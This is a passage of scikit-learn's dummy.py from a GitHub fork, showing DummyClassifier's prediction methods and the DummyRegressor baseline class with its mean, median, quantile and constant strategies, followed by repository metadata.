classes_ = [np.array([c]) for c in constant]
y = random_choice_csc(n_samples, classes_, class_prob,
self.random_state)
else:
if self.strategy == "most_frequent":
y = np.tile([classes_[k][class_prior_[k].argmax()] for
k in range(self.n_outputs_)], [n_samples, 1])
elif self.strategy == "stratified":
y = np.vstack([classes_[k][proba[k].argmax(axis=1)] for
k in range(self.n_outputs_)]).T
elif self.strategy == "uniform":
ret = [classes_[k][rs.randint(n_classes_[k], size=n_samples)]
for k in range(self.n_outputs_)]
y = np.vstack(ret).T
elif self.strategy == "constant":
y = np.tile(self.constant, (n_samples, 1))
if self.n_outputs_ == 1 and not self.output_2d_:
y = np.ravel(y)
return y
def predict_proba(self, X):
"""
Return probability estimates for the test vectors X.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Input vectors, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
P : array-like or list of array-like of shape = [n_samples, n_classes]
Returns the probability of the sample for each class in
the model, where classes are ordered arithmetically, for each
output.
"""
if not hasattr(self, "classes_"):
raise ValueError("DummyClassifier not fitted.")
X = check_array(X, accept_sparse=['csr', 'csc', 'coo'])
# numpy random_state expects Python int and not long as size argument
# under Windows
n_samples = int(X.shape[0])
rs = check_random_state(self.random_state)
n_classes_ = self.n_classes_
classes_ = self.classes_
class_prior_ = self.class_prior_
constant = self.constant
if self.n_outputs_ == 1 and not self.output_2d_:
# Get same type even for self.n_outputs_ == 1
n_classes_ = [n_classes_]
classes_ = [classes_]
class_prior_ = [class_prior_]
constant = [constant]
P = []
for k in range(self.n_outputs_):
if self.strategy == "most_frequent":
ind = np.ones(n_samples, dtype=int) * class_prior_[k].argmax()
out = np.zeros((n_samples, n_classes_[k]), dtype=np.float64)
out[:, ind] = 1.0
elif self.strategy == "stratified":
out = rs.multinomial(1, class_prior_[k], size=n_samples)
elif self.strategy == "uniform":
out = np.ones((n_samples, n_classes_[k]), dtype=np.float64)
out /= n_classes_[k]
elif self.strategy == "constant":
ind = np.where(classes_[k] == constant[k])
out = np.zeros((n_samples, n_classes_[k]), dtype=np.float64)
out[:, ind] = 1.0
P.append(out)
if self.n_outputs_ == 1 and not self.output_2d_:
P = P[0]
return P
def predict_log_proba(self, X):
"""
Return log probability estimates for the test vectors X.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Input vectors, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
P : array-like or list of array-like of shape = [n_samples, n_classes]
Returns the log probability of the sample for each class in
the model, where classes are ordered arithmetically for each
output.
"""
proba = self.predict_proba(X)
if self.n_outputs_ == 1:
return np.log(proba)
else:
return [np.log(p) for p in proba]
class DummyRegressor(BaseEstimator, RegressorMixin):
"""
DummyRegressor is a regressor that makes predictions using
simple rules.
This regressor is useful as a simple baseline to compare with other
(real) regressors. Do not use it for real problems.
Parameters
----------
strategy : str
Strategy to use to generate predictions.
* "mean": always predicts the mean of the training set
* "median": always predicts the median of the training set
* "quantile": always predicts a specified quantile of the training set,
provided with the quantile parameter.
* "constant": always predicts a constant value that is provided by
the user.
constant : int or float or array of shape = [n_outputs]
The explicit constant as predicted by the "constant" strategy. This
parameter is useful only for the "constant" strategy.
quantile : float in [0.0, 1.0]
The quantile to predict using the "quantile" strategy. A quantile of
0.5 corresponds to the median, while 0.0 to the minimum and 1.0 to the
maximum.
Attributes
----------
constant_ : float or array of shape [n_outputs]
Mean or median or quantile of the training targets or constant value
given by the user.
n_outputs_ : int,
Number of outputs.
outputs_2d_ : bool,
True if the output at fit is 2d, else false.
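Examples
--------
A minimal usage sketch; the data values below are illustrative only.

>>> import numpy as np
>>> X = np.zeros((4, 1))  # features are ignored by the dummy rules
>>> y = np.array([1.0, 2.0, 3.0, 4.0])
>>> reg = DummyRegressor(strategy="mean")
>>> reg.fit(X, y).predict(X)  # every prediction is the training mean
array([ 2.5,  2.5,  2.5,  2.5])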
"""
def __init__(self, strategy="mean", constant=None, quantile=None):
self.strategy = strategy
self.constant = constant
self.quantile = quantile
def fit(self, X, y, sample_weight=None):
"""Fit the random regressor.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples
and n_features is the number of features.
y : array-like, shape = [n_samples] or [n_samples, n_outputs]
Target values.
sample_weight : array-like of shape = [n_samples], optional
Sample weights.
Returns
-------
self : object
Returns self.
"""
if self.strategy not in ("mean", "median", "quantile", "constant"):
raise ValueError("Unknown strategy type: %s, expected "
"'mean', 'median', 'quantile' or 'constant'"
% self.strategy)
y = check_array(y, ensure_2d=False)
if len(y) == 0:
raise ValueError("y must not be empty.")
self.output_2d_ = y.ndim == 2
if y.ndim == 1:
y = np.reshape(y, (-1, 1))
self.n_outputs_ = y.shape[1]
check_consistent_length(X, y, sample_weight)
if self.strategy == "mean":
self.constant_ = np.average(y, axis=0, weights=sample_weight)
elif self.strategy == "median":
if sample_weight is None:
self.constant_ = np.median(y, axis=0)
else:
self.constant_ = [_weighted_percentile(y[:, k], sample_weight,
percentile=50.)
for k in range(self.n_outputs_)]
elif self.strategy == "quantile":
if self.quantile is None or not np.isscalar(self.quantile):
raise ValueError("Quantile must be a scalar in the range "
"[0.0, 1.0], but got %s." % self.quantile)
percentile = self.quantile * 100.0
if sample_weight is None:
self.constant_ = np.percentile(y, axis=0, q=percentile)
else:
self.constant_ = [_weighted_percentile(y[:, k], sample_weight,
percentile=percentile)
for k in range(self.n_outputs_)]
elif self.strategy == "constant":
if self.constant is None:
raise TypeError("Constant target value has to be specified "
"when the constant strategy is used.")
self.constant = check_array(self.constant,
accept_sparse=['csr', 'csc', 'coo'],
ensure_2d=False, ensure_min_samples=0)
if self.output_2d_ and self.constant.shape[0] != y.shape[1]:
raise ValueError(
"Constant target value should have "
"shape (%d, 1)." % y.shape[1])
self.constant_ = self.constant
self.constant_ = np.reshape(self.constant_, (1, -1))
return self
def predict(self, X):
"""
Perform regression on test vectors X.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Input vectors, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
y : array, shape = [n_samples] or [n_samples, n_outputs]
Predicted target values for X.
"""
if not hasattr(self, "constant_"):
raise ValueError("DummyRegressor not fitted.")
X = check_array(X, accept_sparse=['csr', 'csc', 'coo'])
n_samples = X.shape[0]
y = np.ones((n_samples, 1)) * self.constant_
if self.n_outputs_ == 1 and not self.output_2d_:
y = np.ravel(y)
return y
| {
"content_hash": "6c0f90f4aa6bc5f9f3f4e2a6b3c76899",
"timestamp": "",
"source": "github",
"line_count": 464,
"max_line_length": 79,
"avg_line_length": 36.185344827586206,
"alnum_prop": 0.549434187016081,
"repo_name": "icdishb/scikit-learn",
"id": "196aefb45b0b71f06004ce198b5d47f203f8644f",
"size": "16967",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "sklearn/dummy.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "1786"
},
{
"name": "C",
"bytes": "385829"
},
{
"name": "C++",
"bytes": "139482"
},
{
"name": "Makefile",
"bytes": "1364"
},
{
"name": "PowerShell",
"bytes": "13427"
},
{
"name": "Python",
"bytes": "5721648"
},
{
"name": "Shell",
"bytes": "4182"
}
],
"symlink_target": ""
} |